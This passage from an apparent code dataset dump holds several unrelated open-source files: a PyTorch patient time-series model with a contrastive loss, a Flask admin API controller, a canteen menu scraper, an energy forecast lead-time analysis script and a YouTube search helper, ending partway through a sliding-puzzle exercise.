str(i + 1), nn.Linear(int(math.sqrt(emb_v_size)), emb_v_size, bias=False))\r\n setattr(self, \"emb_t1_\" + str(i + 1), nn.Linear(1, int(math.sqrt(emb_v_size))))\r\n setattr(self, \"emb_t2_\" + str(i + 1), nn.Linear(int(math.sqrt(emb_v_size)), emb_v_size, bias=False))\r\n self.emb_v1 = [getattr(self, \"emb_v1_\" + str(i + 1)) for i in range(input_v_size)]\r\n self.emb_v2 = [getattr(self, \"emb_v2_\" + str(i + 1)) for i in range(input_v_size)]\r\n self.emb_t1 = [getattr(self, \"emb_t1_\" + str(i + 1)) for i in range(input_v_size)]\r\n self.emb_t2 = [getattr(self, \"emb_t2_\" + str(i + 1)) for i in range(input_v_size)]\r\n\r\n self.Wx = nn.Linear(input_v_size*emb_v_size, proj_e_size)\r\n self.Wt = nn.Linear(input_v_size*emb_v_size, proj_e_size)\r\n self.tanh = nn.Tanh()\r\n\r\n def forward(self, x, time):\r\n out = [self.emb_v2[i](self.tanh(self.emb_v1[i](x[:, :, i].unsqueeze(2)))) for i in range(self.input_v_size)]\r\n x_out = torch.stack(out).permute(1, 2, 0, 3)\r\n out = [self.emb_t2[i](self.tanh(self.emb_t1[i](time[:, :, i].unsqueeze(2)))) for i in range(self.input_v_size)]\r\n time_out = torch.stack(out).permute(1, 2, 0, 3)\r\n\r\n x_out = x_out.reshape(x_out.shape[0], x_out.shape[1], -1)\r\n time_out = time_out.reshape(time_out.shape[0], time_out.shape[1], -1)\r\n final_out = self.Wx(x_out) + self.Wt(time_out)\r\n\r\n return final_out\r\n\r\n\r\nclass CrossModule(nn.Module):\r\n def __init__(self, emb_f_size, input_v_size, input_v_len, emb_v_size, proj_e_size):\r\n super(CrossModule, self).__init__()\r\n self.input_v_size = input_v_size\r\n self.vte = ValueTimeEmbedding(input_v_size, emb_v_size, proj_e_size)\r\n self.fe = FeatureEmbedding(emb_f_size)\r\n self.fe_att = nn.Linear(emb_f_size * 5, emb_v_size)\r\n self.vte_seq = nn.Linear(input_v_len, 1)\r\n\r\n self.conv = nn.Conv1d(proj_e_size, proj_e_size, kernel_size=2 * 1 + 1, stride=1, padding=1)\r\n self.softmax = nn.Softmax(dim=2)\r\n\r\n def forward(self, f_idx, x, 
time):\r\n Ex = self.vte(x, time)\r\n Ex_ = self.vte_seq(Ex.permute(0, 2, 1))\r\n Ex_fea = Ex.permute(0, 2, 1)\r\n if f_idx == None:\r\n return Ex_fea.permute(0, 2, 1)\r\n\r\n Ef = self.fe(f_idx)\r\n Ef = Ef.view(self.input_v_size, -1)\r\n Ef = Ef.unsqueeze(0).expand(x.shape[0], Ef.shape[0], Ef.shape[1])\r\n Ef_ = self.fe_att(Ef)\r\n Ef_ = Ef_.reshape(Ef_.shape[0],-1).unsqueeze(2)\r\n\r\n E = torch.bmm(Ef_, Ex_.permute(0, 2, 1)) / torch.sqrt(torch.tensor(self.input_v_size).to(utils.device))\r\n att = self.softmax(self.conv(E))\r\n out = torch.bmm(att, Ex_fea).permute(0, 2, 1)\r\n\r\n return out\r\n\r\n\r\nclass Similarity(nn.Module):\r\n def __init__(self, input_v_size, base_size, base_emb_size, phi):\r\n super(Similarity, self).__init__()\r\n self.input_v_size = input_v_size\r\n self.phi = nn.Parameter(torch.tensor(phi), requires_grad=True)\r\n self.visit = nn.Linear(input_v_size, 1)\r\n self.proj = nn.Linear(base_size, base_emb_size)\r\n self.softmax = nn.Softmax(dim=1)\r\n\r\n def forward(self, Ex, base):\r\n base = self.proj(base)\r\n visit_att = self.softmax(self.visit(Ex))\r\n Ex_ = torch.bmm(visit_att.permute(0, 2, 1), Ex).squeeze(1)\r\n Ex_all = torch.cat((Ex_, base), 1)\r\n adj_matrix = torch.mm(Ex_all, Ex_all.T) / torch.pow(torch.tensor(self.input_v_size).to(utils.device), 2)\r\n\r\n adj_matrix_out = torch.where(adj_matrix > self.phi, adj_matrix, torch.zeros(adj_matrix.shape).to(utils.device))\r\n\r\n return adj_matrix_out, Ex_all, base\r\n\r\n\r\nclass GraphConvolution(nn.Module):\r\n def __init__(self, in_features, out_features, task, bias=True):\r\n super(GraphConvolution, self).__init__()\r\n self.in_features = in_features\r\n self.out_features = out_features\r\n self.task = task\r\n self.weight = nn.Parameter(torch.FloatTensor(in_features, out_features))\r\n if bias:\r\n self.bias = nn.Parameter(torch.FloatTensor(out_features))\r\n else:\r\n self.register_parameter('bias', None)\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n stdv = 1. 
/ math.sqrt(self.weight.size(1))\r\n self.weight.data.uniform_(-stdv, stdv)\r\n if self.bias is not None:\r\n self.bias.data.uniform_(-stdv, stdv)\r\n\r\n def forward(self, input, adj):\r\n if self.task == 'Imputation':\r\n support = torch.matmul(input, self.weight)\r\n output = torch.matmul(support.permute(1, 2, 0), adj.T).permute(2, 0, 1)\r\n if self.task == 'Prediction':\r\n support = torch.mm(input, self.weight)\r\n output = torch.spmm(adj, support)\r\n if self.bias is not None:\r\n return output + self.bias\r\n else:\r\n return output\r\n\r\n\r\nclass GCN(nn.Module):\r\n def __init__(self, input_size, hid1_size, hid2_size, task):\r\n super(GCN, self).__init__()\r\n self.gc1 = GraphConvolution(input_size, hid1_size, task)\r\n self.gc2 = GraphConvolution(hid1_size, hid2_size, task)\r\n\r\n def forward(self, x, adj):\r\n x = F.relu(self.gc1(x, adj))\r\n # x = F.dropout(x, self.dropout, training=self.training)\r\n x = self.gc2(x, adj)\r\n return F.log_softmax(x, dim=1)\r\n\r\n\r\nclass InfoAgg(nn.Module):\r\n def __init__(self, input_size, hid_size):\r\n super(InfoAgg, self).__init__()\r\n self.proj = nn.Linear(hid_size, input_size)\r\n self.proj1 = nn.Linear(input_size, 1)\r\n self.proj2 = nn.Linear(input_size, 1)\r\n self.sigmoid = nn.Sigmoid()\r\n\r\n def forward(self, x_self, x_other):\r\n x_other = self.proj(x_other)\r\n gamma = self.sigmoid(self.proj1(x_self))\r\n eta = self.sigmoid(self.proj2(x_other))\r\n gamma = gamma / (gamma + eta)\r\n eta = 1 - gamma\r\n x_final = gamma * x_self + eta * x_other\r\n\r\n return x_final\r\n\r\n\r\nclass Model(nn.Module):\r\n def __init__(self, emb_f_size, input_v_size, emb_v_size, proj1_e_size, proj2_e_size, base_size, base_emb_size, hid1_size, hid2_size, phi, drop_p, task):\r\n super(Model, self).__init__()\r\n self.input_v_size = input_v_size\r\n self.base_emb_size = base_emb_size\r\n self.task = task\r\n input_v_len = 211\r\n self.Emb = CrossModule(emb_f_size, input_v_size, input_v_len, emb_v_size, proj1_e_size)\r\n if self.task == 'Imputation':\r\n self.Emb_last = CrossModule(emb_f_size, input_v_size, input_v_len, emb_v_size, proj2_e_size)\r\n self.Emb_next = CrossModule(emb_f_size, input_v_size, input_v_len, emb_v_size, proj2_e_size)\r\n self.Sim = Similarity(proj1_e_size, base_size, base_emb_size, phi)\r\n self.Gcn = GCN(proj1_e_size + base_emb_size, hid1_size, hid2_size, task)\r\n self.Agg = InfoAgg(proj1_e_size + base_emb_size, hid2_size)\r\n self.W1 = nn.Linear(proj1_e_size + base_emb_size, input_v_size)\r\n self.W2 = nn.Linear(proj2_e_size * 2, input_v_size)\r\n self.Wy = nn.Linear(proj1_e_size + base_emb_size, 2)\r\n self.softmax = nn.Softmax(dim=1)\r\n self.dropout = nn.Dropout(p=drop_p)\r\n\r\n def forward(self, f_idx, x, time, xbase, mask):\r\n time = time.unsqueeze(2).expand(time.shape[0], time.shape[1], self.input_v_size)\r\n\r\n if self.task == 'Imputation':\r\n time = time * mask\r\n\r\n time_last_list = []\r\n time_next_list = []\r\n x_last_list = []\r\n x_next_list = []\r\n for i in range(x.shape[0]):\r\n time_last, time_next = utils.data_process(time[i])\r\n time_last_list.append(time_last)\r\n time_next_list.append(time_next)\r\n x_last, x_next = utils.data_process(x[i])\r\n x_last_list.append(x_last)\r\n x_next_list.append(x_next)\r\n\r\n time_last = torch.stack(time_last_list)\r\n time_next = torch.stack(time_next_list)\r\n x_last = torch.stack(x_last_list)\r\n x_next = torch.stack(x_next_list)\r\n time = utils.hdl_time(time, self.input_v_size)\r\n time_last = utils.hdl_time(time_last, self.input_v_size)\r\n time_next = 
utils.hdl_time(time_next, self.input_v_size)\r\n if self.task == 'Prediction':\r\n time = utils.hdl_time(time, self.input_v_size)\r\n\r\n # 1.Embedding\r\n Ex = self.Emb(f_idx, x, time) # b x seq_len x input_v_size\r\n\r\n # 2.Similar Patients Discovery\r\n adj_matrix_out, Ex_all, ebase = self.Sim(Ex, xbase)\r\n if self.task == 'Imputation':\r\n ebase = ebase.unsqueeze(1).expand(ebase.shape[0], Ex.shape[1], ebase.shape[1])\r\n Ex = torch.cat((Ex, ebase), 2)\r\n x_self = Ex\r\n x_other = self.Gcn(Ex, adj_matrix_out)\r\n x_final = self.Agg(x_self, x_other)\r\n Ex_last = self.Emb_last(None, x_last, time_last)\r\n Ex_next = self.Emb_next(None, x_next, time_next)\r\n x_cmb = torch.cat((Ex_last, Ex_next), 2)\r\n # 3.Prediction\r\n output = self.W1(x_final) + self.W2(x_cmb)\r\n if self.task == 'Prediction':\r\n x_self = Ex_all\r\n x_other = self.Gcn(Ex_all, adj_matrix_out)\r\n x_final = self.Agg(x_self, x_other)\r\n x_final = self.dropout(x_final)\r\n # 3.Prediction\r\n output = self.softmax(self.Wy(x_final))\r\n\r\n return output, x_final\r\n\r\n\r\nclass CLLoss(nn.Module):\r\n def __init__(self, temperature=0.07, contrast_mode='all',\r\n base_temperature=0.07):\r\n super(CLLoss, self).__init__()\r\n self.temperature = temperature\r\n self.contrast_mode = contrast_mode\r\n self.base_temperature = base_temperature\r\n\r\n def forward(self, features, labels=None, mask=None):\r\n if len(features.shape) < 3:\r\n raise ValueError('`features` needs to be [bsz, n_views, ...],'\r\n 'at least 3 dimensions are required')\r\n if len(features.shape) > 3:\r\n features = features.view(features.shape[0], features.shape[1], -1)\r\n\r\n batch_size = features.shape[0]\r\n if labels is not None and mask is not None:\r\n raise ValueError('Cannot define both `labels` and `mask`')\r\n elif labels is None and mask is None:\r\n mask = torch.eye(batch_size, dtype=torch.float32).to(utils.device)\r\n elif labels is not None:\r\n labels = labels.contiguous().view(-1, 1)\r\n if labels.shape[0] != batch_size:\r\n raise ValueError('Num of labels does not match num of features')\r\n mask = torch.eq(labels, labels.T).float().to(utils.device)\r\n else:\r\n mask = mask.float().to(utils.device)\r\n\r\n contrast_count = features.shape[1]\r\n contrast_feature = torch.cat(torch.unbind(features, dim=1), dim=0)\r\n if self.contrast_mode == 'one':\r\n anchor_feature = features[:, 0]\r\n anchor_count = 1\r\n elif self.contrast_mode == 'all':\r\n anchor_feature = contrast_feature\r\n anchor_count = contrast_count\r\n else:\r\n raise ValueError('Unknown mode: {}'.format(self.contrast_mode))\r\n\r\n anchor_dot_contrast = torch.div(\r\n torch.matmul(anchor_feature, contrast_feature.T),\r\n self.temperature)\r\n\r\n logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\r\n logits = anchor_dot_contrast - logits_max.detach()\r\n\r\n mask = mask.repeat(anchor_count, contrast_count)\r\n logits_mask = torch.scatter(\r\n torch.ones_like(mask),\r\n 1,\r\n torch.arange(batch_size * anchor_count).view(-1, 1).to(utils.device),\r\n 0\r\n )\r\n mask = mask * logits_mask\r\n\r\n exp_logits = torch.exp(logits) * logits_mask\r\n tmp = exp_logits.sum(1, keepdim=True)\r\n tmp = torch.where(tmp==0,torch.zeros(tmp.shape).to(utils.device).float()+1e-3,tmp)\r\n log_prob = logits - torch.log(tmp)\r\n\r\n mean_log_prob_pos = (mask * log_prob).sum(1) / mask.sum(1)\r\n\r\n loss = - (self.temperature / self.base_temperature) * mean_log_prob_pos\r\n loss = loss.view(anchor_count, batch_size).mean()\r\n\r\n return 
loss\r\n","repo_name":"liulab1356/CL-ImpPreNet","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"2781557795","text":"'''\n@Author: hua\n@Date: 2019-06-11 14:59:11\n@description: \n@LastEditors: hua\n@LastEditTime: 2019-12-12 14:37:09\n'''\nfrom app import app,CONST\nfrom app.Vendor.Decorator import validator\nfrom app.Vendor.UsersAuthJWT import UsersAuthJWT\nfrom app.Admin.Controllers.BaseController import BaseController\nfrom app.Vendor.Decorator import transaction\nfrom app.Models.Admin import Admin\nfrom app.Admin.Service.AdminService import AdminService\nfrom sqlalchemy import or_\n\n@app.route('/api/v2/admin/list', methods=['POST'])\n@validator(name=\"page_no\", rules={'type': 'integer'}, default=0)\n@validator(name=\"per_page\", rules={'type': 'integer'}, default=15)\n@validator(name=\"keyword\", rules={'type': 'string'})\n@validator(name=\"orderBy\", rules={'type': 'string'}, default='update_time')\n@validator(name=\"order\", rules={'type': 'string'}, default='desc')\n@UsersAuthJWT.AdminApiAuth\ndef adminList(*args, **kwargs):\n \"\"\" 获取管理员列表 \"\"\"\n params = kwargs['params']\n filters = {\n Admin.name.like('%'+params['keyword']+'%'),\n or_(Admin.mobile.like('%'+params['keyword']+'%')),\n or_(Admin.email.like('%'+params['keyword']+'%'))\n }\n data = Admin().getList(filters,params['orderBy']+\" \"+params['order'],(),params['page_no'], params['per_page'])\n return BaseController().successData(data)\n\n@app.route('/api/v2/admin/delete', methods=['GET'])\n@validator(name=\"id\", rules={'type': 'string'}, default=0)\n@UsersAuthJWT.AdminApiAuth\n@transaction\ndef adminDelete(*args, **kwargs):\n \"\"\" 删除管理员 \"\"\"\n params = kwargs['params']\n filters = {\n Admin.id == params['id']\n }\n Admin().delete(filters)\n return BaseController().successData()\n\n@app.route('/api/v2/admin/add', methods=['POST'])\n@validator(name=\"name\", rules={'type': 'string'}, default='')\n@validator(name=\"pwd\", rules={'type': 'string'}, default='')\n@UsersAuthJWT.AdminApiAuth\ndef adminAdd(*args, **kwargs):\n \"\"\" 增加管理员 \"\"\"\n params = kwargs['params']\n data = AdminService().add(params)\n if data['error_code'] != CONST['CODE']['SUCCESS']['value']:\n return BaseController().json(data)\n return BaseController().successData()\n\n@app.route('/api/v2/admin/edit', methods=['POST'])\n@validator(name=\"id\", rules={'type': 'integer'}, default='')\n@validator(name=\"pwd\", rules={'type': 'string'}, default='')\n@UsersAuthJWT.AdminApiAuth\n@transaction\ndef adminEdit(*args, **kwargs):\n \"\"\" 修改管理员密码 \"\"\"\n params = kwargs['params']\n filters = {\n Admin.id == params['id']\n }\n AdminService().edit(params, filters)\n return BaseController().successData()\n","repo_name":"huaSoftware/chat","sub_path":"chatApi/app/Admin/Controllers/AdminController.py","file_name":"AdminController.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"44"} +{"seq_id":"8205571748","text":"import requests\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\n\ndef menza():\n\n\tpage = requests.get('http://www.kam.vutbr.cz/?p=menu&provoz=5')\n\n\tsoup = BeautifulSoup(page.content, \"lxml\")\n\n\tmenu = soup.find_all(\"table\", class_=\"htab\")\n\t#print(menu[0].encode('utf-8').strip())\n\tres = {\"menu\" : {\"start_date\" : \"\",\n\t\t\t\"end_date\" : \"\",\n\t\t\t\"dishes\" : 
[]\n\t\t\t}}\n\n\tfor row in menu[0].find_all(\"tr\"):\n\t\tname = row.find(\"td\", class_=\"levyjid\")\n\t\tres['menu'][\"dishes\"].append({\"dish\" : {\n\t\t\t\"name\" : name.get_text()\n\t\t\t}})\n\n\treturn res\n\nif __name__ == \"__main__\":\n\tprint(menza())\n","repo_name":"petrstehlik/food","sub_path":"menza.py","file_name":"menza.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24409709323","text":"\"\"\"\nLead time analysis for residual load, wind production, spv production and consumption:\n\nThe user decides what forecast to use as benchmark forecast and what intraday forecast to use.\nThe user also defines what issue date to look at from the benchmark forecast, the timestamp of interest (data time) and\nthe time delta (how far back to look).\nThis code then subtracts the estimated residual load, wind production, spv production and consumption from the benchmark\nforecast with the intraday forecast. This way we can investigate how the intraday forecast differs from the\nbenchmark forecast for each release (each 15 min).\n\n\nUsed libraries:\nvolue_insight_timeseries: A library from volue used to access Volue Insight's API. To install, run: pip install\nvolue-insight-timeseries.\npandas: A python library used to handle data. To install, run pip install pandas\nos: Functionalities for interacting with the operating system. This is a standard python library,\n so no installation is needed.\nplotly.express: A module from plotly containing functions used to create graph plots. To install, run\n pip install plotly\nplotly.graph_objects: Another module of the plotly library used to create plots.\n\n\n# User defined inputs:\n# area: The area of interest, eg. 
DE, PL etc.\n# benchmark_forecast: 'ec00', 'ec12', 'entsoe_da' or 'entsoe_intraday'\n# intraday_forecast: 'intraday' or 'intraday_lastec'\n# issue_date: The date where the benchmark-curve (instance curve) was issued.\n# time_delta: Defines how many hours of the intraday curve (absolute curve) that is to be retrieved.\n# data_time: The timestamp of the forecasted value.\n\n\"\"\"\nfrom volue_insight_timeseries import Session\nimport pandas as pd\nimport os\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n# ***********************************\n# User defined inputs:\narea = \"DE\"\nbenchmark_forecast = \"ec00\"\nintraday_forecast = \"intraday\"\nissue_date = \"2023-11-26T00:00\"\ntime_delta = 12\ndata_time = \"2023-11-27T10:00\"\n# ***********************************\n\n\ndef get_input_data(\n benchmark_forecast: str, intraday_forecast: str, area: str\n) -> tuple:\n \"\"\"This function maps the user inputs to available forecasts.\n\n Args:\n benchmark_forecast: User defined benchmark forecast\n intraday_forecast: User defined intraday forecast\n area: User defined area\n\n Returns:\n tuple: Two dictionaries containing curve names are returned as a tuple.\n \"\"\"\n tz = timezone_mapping(area)\n curve_dict = {\n \"ec00\": {\n \"wnd\": f\"pro {area} wnd ec00 mwh/h {tz} min15 f\",\n \"spv\": f\"pro {area} spv ec00 mwh/h {tz} min15 f\",\n \"con\": f\"con {area} ec00 mwh/h {tz} min15 f\",\n \"rdl\": f\"rdl {area} ec00 mwh/h {tz} min15 f\",\n },\n \"ec12\": {\n \"wnd\": f\"pro {area} wnd ec12 mwh/h {tz} min15 f\",\n \"spv\": f\"pro {area} spv ec12 mwh/h {tz} min15 f\",\n \"con\": f\"con {area} ec12 mwh/h {tz} min15 f\",\n \"rdl\": f\"rdl {area} ec12 mwh/h {tz} min15 f\",\n },\n \"entsoe_da\": {\n \"wnd\": f\"pro {area} wnd da entso-e mwh/h {tz} h f\",\n \"spv\": f\"pro {area} spv da entso-e mwh/h {tz} h f\",\n \"con\": f\"con {area} da entso-e mwh/h {tz} h f\",\n \"rdl\": f\"rdl {area} da entso-e mwh/h {tz} h f\",\n },\n \"entsoe_intraday\": {\n \"wnd\": f\"pro {area} wnd intraday entso-e mwh/h {tz} h f\",\n \"spv\": f\"pro {area} spv intraday entso-e mwh/h {tz} h f\",\n \"con\": f\"con {area} intraday entso-e mwh/h {tz} h f\",\n \"rdl\": f\"rdl {area} intraday entso-e mwh/h {tz} h f\",\n },\n \"multi-source_forecast\": {\n \"wnd\": f\"pro {area} wnd intraday mwh/h {tz} min15 f\",\n \"spv\": f\"pro {area} spv intraday mwh/h {tz} min15 f\",\n \"con\": f\"con {area} intraday mwh/h {tz} min15 f\",\n \"rdl\": f\"rdl {area} intraday mwh/h {tz} min15 f\",\n },\n \"intraday_lastec\": {\n \"wnd\": f\"pro {area} wnd intraday lastec mwh/h {tz} min15 f\",\n \"spv\": f\"pro {area} spv intraday lastec mwh/h {tz} min15 f\",\n \"con\": f\"con {area} intraday lastec mwh/h {tz} min15 f\",\n \"rdl\": f\"rdl {area} intraday mwh/h {tz} min15 f\",\n },\n }\n return curve_dict[benchmark_forecast], curve_dict[intraday_forecast]\n\n\ndef getkey() -> Session:\n \"\"\"This function configures Session from volue_insight_timeseries with local environment variable \"WAPI_INI_READ\"\n to allow for connection to Volue Insight's API.\n\n Returns:\n session (volue_insight_timeseries.session.Session): A session object that can\n communicate with Volue Insight's API.\n \"\"\"\n\n config = os.getenv(\"WAPI_INI_READ\")\n session = Session(config_file=config)\n return session\n\n\ndef get_instance_curve(session: Session, curve_name: str, issue_date: str) -> pd.Series:\n \"\"\"This function retrieves the instance curve released at the determined issue date.\n Args:\n session: Session object to interact with Volue 
Insight's API.\n curve_name: The name of the curve that is to be retrieved as an instance curve.\n issue_date: The user defined date of issue for the instance curve.\n\n Returns:\n time_series_pandas: Curve data as a pandas time series.\n \"\"\"\n instance_curve = session.get_curve(name=curve_name)\n time_series = instance_curve.get_instance(issue_date=issue_date)\n time_series_pandas = time_series.to_pandas()\n return time_series_pandas\n\n\ndef get_absolute_curve(\n data_time: pd.Timestamp,\n session: Session,\n curve_name: str,\n delta_hours: pd.Timedelta,\n) -> pd.Series:\n \"\"\"This function retrieves the curve which displays how the forecasted value at timestamp \"data_time\" develops\n with each release (absolute curve).\n\n Args:\n data_time: The timestamp of the forecasted value.\n session: Session object to interact with Volue Insight's API.\n curve_name: The name of the curve that is to be retrieved as an absolute curve.\n delta_hours: A value that defines how many hours back from the timestamp of data_time to retrieve data.\n\n Returns:\n time_series_pandas: Absolute curve data as pandas time series.\n \"\"\"\n\n date_from = pd.Timestamp(data_time) - pd.Timedelta(hours=delta_hours)\n curve = session.get_curve(name=curve_name)\n time_series = curve.get_absolute(\n issue_date_from=date_from,\n issue_date_to=data_time,\n data_date=data_time,\n issue_frequency=\"MIN15\",\n )\n time_series_pandas = time_series.to_pandas()\n return time_series_pandas\n\n\ndef get_instance_data(\n instance_curves_names: dict, session: Session, issue_date: pd.Timestamp\n) -> pd.DataFrame:\n \"\"\"This function uses the get_instance_curve to retrieve the instance curve data from all benchmark curves,\n then maps it into a dataframe.\n\n Args:\n instance_curves_names: A dictionary containing all instance curve names (the benchmark curves).\n session: Session object to interact with Volue Insight's API.\n issue_date: The user defined date of issue for the instance curve.\n\n\n Returns:\n df: A dataframe containing all instance curve data from the benchmark curves.\n \"\"\"\n df = pd.DataFrame()\n for curve_name in instance_curves_names.values():\n instance_curve = get_instance_curve(\n curve_name=curve_name, session=session, issue_date=issue_date\n )\n instance_curve.name = map_name_to_label(instance_curve.name)\n df = pd.concat([df, instance_curve], axis=1)\n return df\n\n\ndef get_absolute_data(\n absolute_curves_names: str,\n session: Session,\n data_time: pd.Timestamp,\n time_delta: pd.Timedelta,\n) -> pd.DataFrame:\n \"\"\"This function uses the get_absolute_curve to retrieve the absolute curve data from all intraday curves,\n then maps it into a dataframe.\n\n Args:\n absolute_curves_names: A dictionary containing all absolute curve names (the intraday curves).\n session: Session object to interact with Volue Insight's API..\n data_time: The timestamp of the forecasted value.\n time_delta: Defines how many hours of the intraday curve that is to be retrieved.\n\n Returns:\n df: A dataframe containing all absolute curve data from the intraday curves.\n \"\"\"\n\n df = pd.DataFrame()\n\n for curve_name in absolute_curves_names.values():\n absolute_curve = get_absolute_curve(\n data_time=data_time,\n session=session,\n curve_name=curve_name,\n delta_hours=time_delta,\n )\n absolute_curve.name = map_name_to_label(absolute_curve.name)\n df = pd.concat([df, absolute_curve], axis=1)\n return df\n\n\ndef timezone_mapping(area: str) -> str:\n \"\"\"This function defines a timezone depending on the area 
input.\n\n Args:\n area: User defined area.\n\n Returns:\n str: The timezone displayed as a string.\n \"\"\"\n if area.upper() == \"TR\":\n return \"trt\"\n elif \"IE\" in area.upper():\n return \"wet\"\n else:\n return \"cet\"\n\n\ndef map_name_to_label(curve_name: str) -> str:\n \"\"\"This function matches one name from the defined dictionary below with an inputted curve name and returns\n a more readable name.\n\n Args:\n curve_name: A curve name, for instance: \"pro fr wnd ec00 mwh/h cet min15 f 2023-11-26T00:00:00+01:00\"\n\n Returns:\n str: A name from the dictionary generated in this function. Can be used as column names in a df.\"\n \"\"\"\n mapping = dict(\n spv=\"Spv production\",\n wnd=\"Wind production\",\n con=\"Consumption\",\n rdl=\"Residual load\",\n )\n return [mapping.get(name, \"Undefined\") for name in mapping if name in curve_name][0]\n\n\ndef create_dataframe(\n instance_curves_df: dict,\n absolute_curves_df: dict,\n area: str,\n data_time: pd.Timestamp,\n) -> pd.DataFrame:\n \"\"\"This function takes two dataframes as input, instance_curves_df and absolute_curves_df and subtracts each of\n the base forecasts' values at the data time timestamp from each value in the corresponding columns in the\n intraday dataframe.\n Args:\n instance_curves_df: A dataframe containing all retrieved data from all the benchmark curves.\n absolute_curves_df: A dataframe containing all retrieved data from all the intraday curves.\n area: The user defined area.\n data_time: The timestamp of the forecasted value.\n\n Returns:\n difference_curves: A dataframe containing the difference values between benchmark forecast and intraday\n forecast. Ready to be plotted.\n \"\"\"\n data_time_timezone = pd.Timestamp(data_time, tz=timezone_mapping(area))\n difference_curves = absolute_curves_df.sub(\n instance_curves_df.loc[data_time_timezone]\n ).dropna()\n\n # Multiply spv and wind production with -1 to align residual load curve with stacked bar plot\n difference_curves.loc[:, [\"Spv production\", \"Wind production\"]] *= -1\n return difference_curves\n\n\ndef plot_difference_curves(\n plot_data: pd.DataFrame,\n benchmark_forecast: str,\n intraday_forecast: str,\n area: str,\n):\n \"\"\"This function plots the data generated in create_dataframe. Production and consumption are plotted as bars,\n but residual load is plotted as a trace/line plot.\n\n Args:\n plot_data: A pandas dataframe containing the difference between the intraday forecast-values and the\n benchmark forecast-value.\n benchmark_forecast: The user defined benchmark forecast.\n intraday_forecast: The user defined intraday forecast.\n area: The user defined area.\n \"\"\"\n color_match = {\n \"Spv production\": \"turquoise\",\n \"Wind production\": \"palegreen\",\n \"Consumption\": \"green\",\n }\n\n fig = px.bar()\n\n for i in range(len(plot_data.columns)):\n column_name = plot_data.columns[i]\n column_data = plot_data.iloc[:, i]\n\n print(\"plotting:\", column_name)\n\n if column_name == \"Residual load\":\n fig.add_trace(\n go.Scatter(\n x=plot_data.index,\n y=column_data,\n mode=\"lines\",\n name=column_name,\n line=dict(color=\"red\"),\n )\n )\n else:\n fig.add_bar(\n x=plot_data.index,\n y=column_data,\n name=column_name,\n marker_color=color_match[column_name],\n )\n\n fig.update_layout(\n xaxis=dict(\n rangeslider=dict(visible=True),\n ),\n title=f\"Lead time analysis at time {data_time} for area: {area.upper()}. Benchmark forecast: {benchmark_forecast.upper()}. 
intraday forecast: {intraday_forecast.upper()}\",\n yaxis_title=\"Shift in MW\",\n xaxis_title=\"Time\",\n )\n fig.update_layout(title_font=dict(size=25))\n fig.show()\n print(\"Run successful\")\n\n\ndef main():\n \"\"\"This function runs through the main part of the code.\"\"\"\n\n instance_curves_names, absolute_curves_names = get_input_data(\n benchmark_forecast, intraday_forecast, area\n )\n session = getkey()\n instance_curves_df = get_instance_data(\n instance_curves_names=instance_curves_names,\n session=session,\n issue_date=issue_date,\n )\n absolute_curves_df = get_absolute_data(\n absolute_curves_names=absolute_curves_names,\n session=session,\n data_time=data_time,\n time_delta=time_delta,\n )\n plot_data = create_dataframe(\n instance_curves_df, absolute_curves_df, area=area, data_time=data_time\n )\n plot_difference_curves(plot_data, benchmark_forecast, intraday_forecast, area)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"volueinsight/volue-insight-timeseries","sub_path":"examples/intraday_examples/lead_time_analysis.py","file_name":"lead_time_analysis.py","file_ext":"py","file_size_in_byte":13925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"16839890617","text":"from apiclient.discovery import build\nfrom database import Base\nfrom models import Song\nfrom config import YOUTUBE_API_VERSION, YOUTUBE_API_SERVICE_NAME, DEVELOPER_KEY\n\n\ndef convert(search_result):\n song_id = search_result['id']['videoId']\n title = search_result['snippet']['title']\n thumbnail_url = search_result['snippet']['thumbnails']['default']['url']\n s = Song(youtube_hash=song_id, title=title, thumbnail_url=thumbnail_url)\n return s\n\n\ndef youtube_search(target_name):\n youtube = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION, developerKey=DEVELOPER_KEY)\n\n search_response = youtube.search().list(\n q=target_name,\n part=\"id,snippet\",\n maxResults=15\n ).execute()\n\n response = search_response.get('items', [])\n videos = [convert(vid) for vid in response if vid['id']['kind'] =='youtube#video']\n return videos","repo_name":"Ladramhaiola/mb_kursach","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5831267283","text":"'''\r\n在一个 2 x 3 的板上(board)有 5 块砖瓦,用数字 1~5 来表示, 以及一块空缺用 0 来表示.\r\n\r\n一次移动定义为选择 0 与一个相邻的数字(上下左右)进行交换.\r\n\r\n最终当板 board 的结果是 [[1,2,3],[4,5,0]] 谜板被解开。\r\n\r\n给出一个谜板的初始状态,返回最少可以通过多少次移动解开谜板,如果不能解开谜板,则返回 -1 。\r\n\r\n示例:\r\n\r\n输入:board = [[1,2,3],[4,0,5]]\r\n输出:1\r\n解释:交换 0 和 5 ,1 步完成\r\n输入:board = [[1,2,3],[5,4,0]]\r\n输出:-1\r\n解释:没有办法完成谜板\r\n输入:board = [[4,1,2],[5,0,3]]\r\n输出:5\r\n解释:\r\n最少完成谜板的最少移动次数是 5 ,\r\n一种移动路径:\r\n尚未移动: [[4,1,2],[5,0,3]]\r\n移动 1 次: [[4,1,2],[0,5,3]]\r\n移动 2 次: [[0,1,2],[4,5,3]]\r\n移动 3 次: [[1,0,2],[4,5,3]]\r\n移动 4 次: [[1,2,0],[4,5,3]]\r\n移动 5 次: [[1,2,3],[4,5,0]]\r\n输入:board = [[3,2,4],[1,5,0]]\r\n输出:14\r\n提示:\r\n\r\nboard 是一个如上所述的 2 x 3 的数组.\r\nboard[i][j] 是一个 [0, 1, 2, 3, 4, 5] 